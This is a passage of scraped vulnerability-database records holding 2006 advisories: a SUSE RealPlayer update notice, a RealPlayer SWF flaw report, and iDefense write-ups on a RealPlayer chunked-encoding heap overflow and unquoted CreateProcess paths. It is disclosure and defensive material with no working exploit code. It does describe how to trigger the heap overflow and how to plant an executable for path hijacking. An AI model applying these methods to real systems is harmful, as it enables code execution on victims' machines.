eaf09598db97183bdb25478dc5266edf\r\n\r\n SUSE LINUX 9.3:\r\n ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/RealPlayer-10.0.7-0.1.i586.rpm\r\n 427de6f3af871dca3d9c6c4f42d14793\r\n\r\n SUSE LINUX 9.2:\r\n ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/RealPlayer-10.0.7-0.1.i586.rpm\r\n e84dd17634bcb046ade69fcdc8d67468\r\n\r\n Sources:\r\n\r\n SUSE LINUX 10.0:\r\n ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/src/RealPlayer-10.0.7-0.1.nosrc.rpm\r\n d686f982312d06ff76ad786c29c94f5a\r\n\r\n SUSE LINUX 9.3:\r\n ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/src/RealPlayer-10.0.7-0.1.src.rpm\r\n 5355bf3f17801d07f9a004711622dc8e\r\n\r\n SUSE LINUX 9.2:\r\n ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/src/RealPlayer-10.0.7-0.1.src.rpm\r\n 0a7e783c563c24107b04b7f7f4e0b697\r\n\r\n Our maintenance customers are notified individually. The packages are\r\n offered for installation from the maintenance web:\r\n\r\n http://support.novell.com/cgi-bin/search/searchtid.cgi?psdb/3ad7b20395a03f666b8f4ffe14e9276d.html\r\n\r\n______________________________________________________________________________\r\n\r\n5) Pending Vulnerabilities, Solutions, and Work-Arounds:\r\n\r\n See SUSE Security Summary Report.\r\n______________________________________________________________________________\r\n\r\n6) Authenticity Verification and Additional Information\r\n\r\n - Announcement authenticity verification:\r\n\r\n SUSE security announcements are published via mailing lists and on Web\r\n sites. The authenticity and integrity of a SUSE security announcement is\r\n guaranteed by a cryptographic signature in each announcement. All SUSE\r\n security announcements are published with a valid signature.\r\n\r\n To verify the signature of the announcement, save it as text into a file\r\n and run the command\r\n\r\n gpg --verify <file>\r\n\r\n replacing <file> with the name of the file where you saved the\r\n announcement. The output for a valid signature looks like:\r\n\r\n gpg: Signature made <DATE> using RSA key ID 3D25D3D9\r\n gpg: Good signature from "SuSE Security Team <security@suse.de>"\r\n\r\n where <DATE> is replaced by the date the document was signed.\r\n\r\n If the security team's key is not contained in your key ring, you can\r\n import it from the first installation CD. To import the key, use the\r\n command\r\n\r\n gpg --import gpg-pubkey-3d25d3d9-36e12d04.asc\r\n\r\n - Package authenticity verification:\r\n\r\n SUSE update packages are available on many mirror FTP servers all over the\r\n world. While this service is considered valuable and important to the free\r\n and open source software community, the authenticity and the integrity of\r\n a package needs to be verified to ensure that it has not been tampered\r\n with.\r\n\r\n There are two verification methods that can be used independently from\r\n each other to prove the authenticity of a downloaded file or RPM package:\r\n\r\n 1) Using the internal gpg signatures of the rpm package\r\n 2) MD5 checksums as provided in this announcement\r\n\r\n 1) The internal rpm package signatures provide an easy way to verify the\r\n authenticity of an RPM package. Use the command\r\n\r\n rpm -v --checksig <file.rpm>\r\n\r\n to verify the signature of the package, replacing <file.rpm> with the\r\n filename of the RPM package downloaded. The package is unmodified if it\r\n contains a valid signature from build@suse.de with the key ID 9C800ACA.\r\n\r\n This key is automatically imported into the RPM database (on\r\n RPMv4-based distributions) and the gpg key ring of 'root' during\r\n installation. You can also find it on the first installation CD and at\r\n the end of this announcement.\r\n\r\n 2) If you need an alternative means of verification, use the md5sum\r\n command to verify the authenticity of the packages. Execute the command\r\n\r\n md5sum <filename.rpm>\r\n\r\n after you downloaded the file from a SUSE FTP server or its mirrors.\r\n Then compare the resulting md5sum with the one that is listed in the\r\n SUSE security announcement. Because the announcement containing the\r\n checksums is cryptographically signed (by security@suse.de), the\r\n checksums show proof of the authenticity of the package if the\r\n signature of the announcement is valid. Note that the md5 sums\r\n published in the SUSE Security Announcements are valid for the\r\n respective packages only. Newer versions of these packages cannot be\r\n verified.\r\n\r\n - SUSE runs two security mailing lists to which any interested party may\r\n subscribe:\r\n\r\n suse-security@suse.com\r\n - General Linux and SUSE security discussion.\r\n All SUSE security announcements are sent to this list.\r\n To subscribe, send an e-mail to\r\n <suse-security-subscribe@suse.com>.\r\n\r\n suse-security-announce@suse.com\r\n - SUSE's announce-only mailing list.\r\n Only SUSE's security announcements are sent to this list.\r\n To subscribe, send an e-mail to\r\n <suse-security-announce-subscribe@suse.com>.\r\n\r\n For general information or the frequently asked questions (FAQ),\r\n send mail to <suse-security-info@suse.com> or\r\n <suse-security-faq@suse.com>.\r\n\r\n =====================================================================\r\n SUSE's security contact is <security@suse.com> or <security@suse.de>.\r\n The <security@suse.de> public key is listed below.\r\n =====================================================================\r\n______________________________________________________________________________\r\n\r\n The information in this advisory may be distributed or reproduced,\r\n provided that the advisory is not modified in any way. In particular, the\r\n clear text signature should show proof of the authenticity of the text.\r\n\r\n SUSE Linux Products GmbH provides no warranties of any kind whatsoever\r\n with respect to the information contained in this security advisory.\r\n\r\nType Bits/KeyID Date User ID\r\npub 2048R/3D25D3D9 1999-03-06 SuSE Security Team <security@suse.de>\r\npub 1024D/9C800ACA 2000-10-19 SuSE Package Signing Key <build@suse.de>\r\n\r\n- -----BEGIN PGP PUBLIC KEY BLOCK-----\r\nVersion: GnuPG v1.4.2 (GNU/Linux)\r\n\r\n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\r\n=ypVs\r\n- -----END PGP PUBLIC KEY BLOCK-----\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.2 (GNU/Linux)\r\n\r\niQEVAwUBRCKOiXey5gA9JdPZAQIpHwf9GLM/WqEyyhEtMDDXZMsQHtH3boux7jt1\r\nu/n6ZnDT7IbEWqMha7KZkI63V1tmPf3jJlJIG/6TcyqZJDg3qdesMVCYgS0KaO3Z\r\nyV/mMKWQBXRpU0AXpGH6uwVMPGxjRD4eC4spWSWLIw6YATWinLnN9AICilBbqgbQ\r\nD/jx6Ga6G8h+BrkH4ZcEzrLu0LtG+4m2PAv5+TNlFLWrlA90Amy8WNwSqCJtMucq\r\nDOC+Xj158Pd8GI5plL2fP85tvf9lOTl2PCmyFTwrK4Us4t2mjTqtSOvN34++oZ83\r\n4CTXKlrOhElpSp6NyZe56i6U22Sw/EhTw3JqlUadW7Ls91mmpqtn2A==\r\n=Lmof\r\n-----END PGP SIGNATURE-----\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "cvss3": {}, "published": "2006-03-23T00:00:00", "type": "securityvulns", "title": "[Full-disclosure] SUSE Security Announcement: RealPlayer security problems (SUSE-SA:2006:018)", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2005-2922", "CVE-2006-0323"], "modified": "2006-03-23T00:00:00", "id": "SECURITYVULNS:DOC:11910", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:11910", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:16", "description": "Realplayer .SWF Multiple Remote Memory Corruption Vulnerabilities\r\n\r\nBy Sowhat of Nevis Labs\r\nDate: 2006.03.22\r\n\r\nhttp://www.nevisnetworks.com\r\nhttp://secway.org/advisory/AD20060322.txt\r\n\r\nCVE: CVE-2006-0323\r\nUS CERT: VU#231028\r\n\r\nVendor\r\nRealNetworks Inc.\r\n\r\nProducts affected:\r\n\r\nWindows\r\nRealPlayer 8\r\nRealOne Player & RealOne Player V2\r\nRealPlayer 10\r\nRealPlayer 10.5\r\n\r\nMacintosh\r\nRealOne Player\r\nRealPlayer 10\r\n\r\nLinux\r\nRealPlayer 10\r\n\r\n\r\nOverview:\r\n\r\nRealPlayer is an application for playing various media formats,\r\ndeveloped by RealNetworks Inc. For more information, visit\r\nhttp://www.real.com/.\r\n\r\nDetails:\r\n\r\nThere are multiple vulnerabilities found in swfformat.dll.\r\nA carefully crafted .swf file may execute arbitrary code or crash the\r\nRealPlayer.\r\n\r\nBy persuading a user to access a specially crafted SWF file with RealPlayer,\r\na remote attacker may be able to execute arbitrary code.\r\nAnd also, these vulnerabilities can be triggered remotely through ActiveX\r\nin IE.\r\n\r\nBy setting the size of SWF files to a value smaller than the actual size,\r\nyou can trigger one of the vulnerabilities.\r\n\r\nActually, there are multiple holes that have been fixed in swfformat.dll.\r\n\r\nPOC:\r\n\r\nNo PoC will be released for this.\r\n\r\n\r\nFIX:\r\n\r\nhttp://service.real.com/realplayer/security/03162006_player/en/\r\n\r\n\r\nVendor Response:\r\n\r\n2005.10.07 Vendor notified via email\r\n2005.10.07 Vendor responded\r\n2005.03.22 Patch released\r\n2006.04.11 Advisory released\r\n\r\n\r\nCommon Vulnerabilities and Exposures (CVE) Information:\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned\r\nthe following names to these issues. These are candidates for\r\ninclusion in the CVE list (http://cve.mitre.org), which standardizes\r\nnames for security problems.\r\n\r\n\r\n CVE-2006-0323\r\n\r\n\r\nGreetings to Paul Gese@real.com, Chi, OYXin, Narasimha Datta and all\r\n Nevis Labs guys.\r\n\r\n\r\nReferences:\r\n\r\n1. http://service.real.com/realplayer/security/03162006_player/en/\r\n2. http://www.kb.cert.org/vuls/id/231028\r\n3. http://www.macromedia.com/licensing/developer/fileformat/faq/\r\n4. http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0323\r\n5. http://www.gentoo.org/security/en/glsa/glsa-200603-24.xml\r\n6. http://www.novell.com/linux/security/advisories/2006_18_realplayer.html\r\n7. http://secunia.com/advisories/19358/\r\n\r\n\r\n\r\n\r\n--\r\nSowhat\r\nhttp://secway.org\r\n"Life is like a bug, Do you know how to exploit it ?"\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "cvss3": {}, "published": "2006-04-11T00:00:00", "type": "securityvulns", "title": "[Full-disclosure] Realplayer .SWF Multiple Remote Memory Corruption Vulnerabilities", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2006-0323"], "modified": "2006-04-11T00:00:00", "id": "SECURITYVULNS:DOC:12161", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:12161", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:16", "description": "RealNetworks RealPlayer and Helix Player Invalid Chunk Size Heap \r\nOverflow Vulnerability\r\n\r\niDefense Security Advisory 03.23.06\r\nhttp://www.idefense.com/intelligence/vulnerabilities/display.php?id=404\r\nMarch 23, 2006\r\n\r\nI. BACKGROUND\r\n\r\nRealPlayer is an application for playing various media formats,\r\ndeveloped by RealNetworks Inc. For more information, visit\r\nhttp://www.real.com/.\r\n\r\nII. DESCRIPTION\r\n\r\nRemote exploitation of a heap-based buffer overflow in RealNetwork Inc's\r\nRealPlayer could allow the execution of arbitrary code in the context of\r\nthe currently logged in user.\r\n\r\nThe vulnerability specifically exists in the handling of the 'chunked'\r\nTransfer-Encoding method. This method breaks the file the server is\r\nsending up into 'chunks'. For each chunk, the server first sends the\r\nlength of the chunk in hexadecimal, followed by the chunk data. This is\r\nrepeated until there are no more chunks. The server then sends a chunk\r\nlength of 0 indicating the end of the transfer.\r\n\r\nThere are multiple ways of triggering this vulnerability.\r\n\r\n * Sending a well-formed chunk header with a length of -1 (FFFFFFFF)\r\n followed by malicious data.\r\n * Sending a well-formed chunk header with a length specified which \r\nis less\r\n than the amount of data that will be sent,\r\n followed by malicious data.\r\n * Not sending a chunk header before sending malicious data.\r\n\r\nEach of these cases result in a heap overflow. Depending on the versions\r\nused, certain of these cases will not cause exploitable issues. However,\r\nthe last case appears to be reliable in triggering a crash.\r\n\r\nIII. ANALYSIS\r\n\r\nSuccessful exploitation allows a remote attacker to execute arbitrary\r\ncode with the privileges of the currently logged in user. In order to\r\nexploit this vulnerability, an attacker would need to entice a user to\r\nfollow a link to a malicious server. Once the user visits a website\r\nunder the control of an attacker, it is possible in a default install of\r\nRealPlayer to force a web-browser to use RealPlayer to connect to an\r\narbitrary server, even when it is not the default application for\r\nhandling those types, by the use of embedded object tags in a webpage.\r\nThis may allow automated exploitation when the page is viewed.\r\n\r\nAs the client sends its version information as part of the request, it\r\nwould be possible for an attacker to create a malicious server which\r\nuses the appropriate offsets and shellcode for each version and platform\r\nof the client.\r\n\r\nIV. DETECTION\r\n\r\niDefense has confirmed the existence of this vulnerability in RealPlayer\r\nVersion 10.4 and 10.5 for Windows and Both RealPlayer 10.4 and Helix\r\nPlayer 1.4 for Linux.\r\n\r\nThe vendor has stated that the following versions are vulnerable:\r\n * RealPlayer 10.5 (6.0.12.1040-1348)\r\n * RealPlayer 10\r\n * RealOne Player v2\r\n * RealOne Player v1\r\n * RealPlayer 8\r\n\r\nIt is suspected that previous versions of RealPlayer and Helix Player\r\nare affected by this vulnerability.\r\n\r\nV. WORKAROUND\r\n\r\nAlthough there is no way to completely protect yourself from this\r\nvulnerability, aside from removing the RealPlayer software, the\r\nfollowing actions may be taken to minimize the risk of automated\r\nexploitation.\r\n\r\nDisable ActiveX controls and plugins, if not necessary for daily\r\noperations, using the following steps:\r\n\r\n1. In IE, click on Tools and select Internet Options from the drop-down \r\nmenu.\r\n2. Click the Security tab and the Custom Level button.\r\n3. Under ActiveX Controls and Plugins, then Run Activex Controls and \r\nPlugins,\r\nclick the Disable radio button.\r\n\r\nIn general, exploitation requires that a targeted user be socially\r\nengineered into visiting a link to a server controlled by an attacker.\r\nAs such, do not visit unknown/untrusted website and do not follow\r\nsuspicious links.\r\n\r\nWhen possible, run client software, especially applications such as IM\r\nclients, web browsers and e-mail clients, from regular user accounts\r\nwith limited access to system resources. This may limit the immediate\r\nconsequences of client-side vulnerabilities such as this.\r\n\r\nVI. VENDOR RESPONSE\r\n\r\nInformation from the vendor about this vulnerability is available at to\r\nfollowing URL:\r\n\r\n http://service.real.com/realplayer/security/03162006_player/en/\r\n\r\nVII. CVE INFORMATION\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\r\nname CAN-2005-2922 to this issue. This is a candidate for inclusion in\r\nthe CVE list (http://cve.mitre.org), which standardizes names for\r\nsecurity problems.\r\n\r\nVIII. DISCLOSURE TIMELINE\r\n\r\n09/08/2005 Initial vendor notification\r\n09/09/2005 Initial vendor response\r\n03/23/2006 Public disclosure\r\n\r\nIX. CREDIT\r\n\r\nThis vulnerability was found internally by Greg MacManus of iDefense Labs.\r\n\r\nGet paid for vulnerability research\r\nhttp://www.idefense.com/poi/teams/vcp.jsp\r\n\r\nFree tools, research and upcoming events\r\nhttp://labs.idefense.com\r\n\r\nX. LEGAL NOTICES\r\n\r\nCopyright (c) 2006 iDefense, Inc.\r\n\r\nPermission is granted for the redistribution of this alert\r\nelectronically. It may not be edited in any way without the express\r\nwritten consent of iDefense. If you wish to reprint the whole or any\r\npart of this alert in any other medium other than electronically, please\r\nemail customerservice@idefense.com for permission.\r\n\r\nDisclaimer: The information in the advisory is believed to be accurate\r\nat the time of publishing based on currently available information. Use\r\nof the information constitutes acceptance for use in an AS IS condition.\r\nThere are no warranties with regard to this information. Neither the\r\nauthor nor the publisher accepts any liability for any direct, indirect,\r\nor consequential loss or damage arising from use of, or reliance on,\r\nthis information.\r\n\r\n\r\n", "cvss3": {}, "published": "2006-03-24T00:00:00", "type": "securityvulns", "title": "iDefense Security Advisory 03.23.06: RealNetworks RealPlayer and Helix Player Invalid Chunk Size Heap Overflow Vulnerability", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2005-2922"], "modified": "2006-03-24T00:00:00", "id": "SECURITYVULNS:DOC:11925", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:11925", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:14", "description": "Multiple Vendor Insecure Call to CreateProcess() Vulnerability\r\n\r\niDEFENSE Security Advisory 11.15.05\r\nwww.idefense.com/application/poi/display?id=340&type=vulnerabilities\r\nNovember 15, 2005\r\n\r\nI. BACKGROUND\r\n\r\nThe Microsoft Windows API includes the CreateProcess() function as a\r\nmeans to create a new process and it's primary thread.\r\nCreateProcessAsUser() is similar but allows for the process to be run in\r\nthe security context of a particular user.\r\n\r\nII. DESCRIPTION\r\n\r\nThe format of the CreateProcess() function is as follows:\r\n\r\nBOOL CreateProcess(\r\n LPCTSTR lpApplicationName,\r\n LPTSTR lpCommandLine,\r\n LPSECURITY_ATTRIBUTES lpProcessAttributes,\r\n LPSECURITY_ATTRIBUTES lpThreadAttributes,\r\n BOOL bInheritHandles,\r\n DWORD dwCreationFlags,\r\n LPVOID lpEnvironment,\r\n LPCTSTR lpCurrentDirectory,\r\n LPSTARTUPINFO lpStartupInfo,\r\n LPPROCESS_INFORMATION lpProcessInformation\r\n);\r\n\r\nThe 'lpApplicationName' variable contains the name of the module to be\r\nexecuted. However, this can be a NULL value, in which case, the module\r\nname to be executed will be the first white space-delimited token in the\r\nlpCommandLine string.\r\n\r\nIt is a known issue, that if lpApplicationName contains a NULL value and\r\nthe full module path in the lpCommandLine variable contains white space\r\nand is not enclosed in quotation marks, it is possible that an alternate\r\napplication will be executed. Consider the following scenario:\r\n\r\n CreateProcess(\r\n NULL,\r\n c:\program files\sub dir\program.exe,\r\n ...\r\n );\r\n\r\nIn this case, the system will successively expand the string when\r\ninterpreting the file path, until a module is encountered to execute.\r\nThe string used in the above example would be interpreted as follows:\r\n\r\n c:\program.exe files\sub dir\program name\r\n c:\program files\sub.exe dir\program name\r\n c:\program files\sub dir\program.exe\r\n\r\nTherefore, if a file named program.exe existed in the c:\ directory, it\r\nwould be executed instead of the intended application. This is a known\r\nissue, discussed directly in the API documentation:\r\n\r\nhttp://msdn.microsoft.com/library/en-us/dllproc/base/createprocessasuser.asp\r\n\r\nIII. ANALYSIS\r\n\r\nDespite the fact that this is a known issue, several popular\r\napplications, insecurely call the CreateProcess() and\r\nCreateProcessAsUser() functions. This creates a scenario whereby\r\narbitrary code could be executed. In the scenario detailed above, if an\r\nattacker were able to install arbitrary code in a file at\r\nc:\program.exe, when the vulnerable application was launched, the code\r\nwould be executed. The arbitrary code would generally be executed under\r\nthe privileges of the executing user but could also be launched with\r\nelevated privilegs if an insecure call were made CreateProcessAsUser()\r\nusing elevated privileges. This attack would involve some form of social\r\nengineering or need to be combined with another attack to first get the\r\narbitrary code installed in the correct location.\r\n\r\nIV. DETECTION\r\n\r\nThe following applications have been confirmed to be vulnerable:\r\n\r\nVendor: RealNetworks\r\nApplication: RealPlayer 10.5\r\nFiles: realplay.exe\r\n realjbox.exe\r\n \r\nVendor: Kaspersky\r\nApplication: Kaspersky Anti-Virus for Windows File Servers 5.0 \r\n(English) - Installation File\r\nFiles: kav5.0trial_winfsen.exe\r\n\r\nVendor: Apple\r\nApplication: iTunes 4.7.1.30\r\nFiles: iTunesHelper.exe\r\n\r\nVendor: VMWare\r\nApplication: VMWare Workstation 5.0.0 build-13124\r\nFiles: VMwareTray.exe\r\n VMwareUser.exe\r\n \r\nVendor: Microsoft\r\nApplication: Microsoft Antispyware 1.0.509 (Beta 1)\r\nFiles: GIANTAntiSpywareMain.exe\r\n gcASNotice.exe\r\n gcasServ.exe\r\n gcasSWUpdater.exe\r\n GIANTAntiSpywareUpdater.exe\r\n\r\nNote: The vulnerability in Microsoft Antispyware was previously\r\ndiscussed on the Full-Disclosure mailing list\r\n(http://lists.grok.org.uk/pipermail/full-disclosure/2005-May/033909.html)\r\nbut remains unpatched.\r\n\r\nV. WORKAROUND\r\n\r\nEnsure that unexpected files are not stored in locations that can be\r\nused for this attack. Windows XP SP2 will alert a user of the existence\r\nof a file named c:\program.exe when it first boots, however, any path\r\ncontaining white space where a vulnerable application is stored could be\r\nused in this attack.\r\n\r\nVI. VENDOR RESPONSE\r\n\r\nThe following vendor responses have been provided.\r\n\r\nApple:\r\n\r\n"Due to the way iTunes 5 launches its helper application, multiple\r\nsystem paths are searched for which program to run. This may allow a\r\nmalicious user on the local system to create an environment where an\r\nalternate program will be executed by iTunes. iTunes 6 addresses this\r\nissue and can be obtained from http://www.apple.com/itunes/download/.\r\nCredit to iDEFENSE for reporting this issue to us."\r\n\r\nKaspersky:\r\n\r\n"We are currently looking into the problem, and it seems that this is\r\nnot present in the current version of KAV for File Servers."\r\n\r\nMicrosoft:\r\n\r\n"Microsoft has confirmed that the Beta 2 version of its Antispyware\r\nproduct, targeted for release later this year, will address the issue\r\nreported by iDEFENSE."\r\n\r\nVII. CVE INFORMATION\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\r\nfollowing names to this issue.\r\n\r\nRealNetworks RealPlayer 10.5\r\n CAN-2005-2936\r\n\r\nKaspersky Anti-Virus 5.0\r\n CAN-2005-2937\r\n\r\nApple iTunes 4.7.1.30\r\n CAN-2005-2938\r\n\r\nVMWare Workstation 5.0.0 build-13124\r\n CAN-2005-2939\r\n\r\nMicrosoft Antispyware 1.0.509 (Beta 1)\r\n CAN-2005-2940\r\n\r\nTheses are candidates for inclusion in the CVE list\r\n(http://cve.mitre.org), which standardizes names for security problems.\r\n\r\nVIII. DISCLOSURE TIMELINE\r\n\r\n09/19/2005 Initial vendor notification\r\n11/15/2005 Coordinated public disclosure\r\n\r\nIX. CREDIT\r\n\r\nThe discoverer of this vulnerability wishes to remain anonymous.\r\n\r\nGet paid for vulnerability research\r\nhttp://www.idefense.com/poi/teams/vcp.jsp\r\n\r\nFree tools, research and upcoming events\r\nhttp://labs.idefense.com\r\n\r\nX. LEGAL NOTICES\r\n\r\nCopyright \u00a9 2005 iDEFENSE, Inc.\r\n\r\nPermission is granted for the redistribution of this alert\r\nelectronically. It may not be edited in any way without the express\r\nwritten consent of iDEFENSE. If you wish to reprint the whole or any\r\npart of this alert in any other medium other than electronically, please\r\nemail customerservice@idefense.com for permission.\r\n\r\nDisclaimer: The information in the advisory is believed to be accurate\r\nat the time of publishing based on currently available information. Use\r\nof the information constitutes acceptance for use in an AS IS condition.\r\nThere are no warranties with regard to this information. Neither the\r\nauthor nor the publisher accepts any liability for any direct, indirect,\r\nor consequential loss or damage arising from use of, or reliance on,\r\nthis information.\r\n", "cvss3": {}, "published": 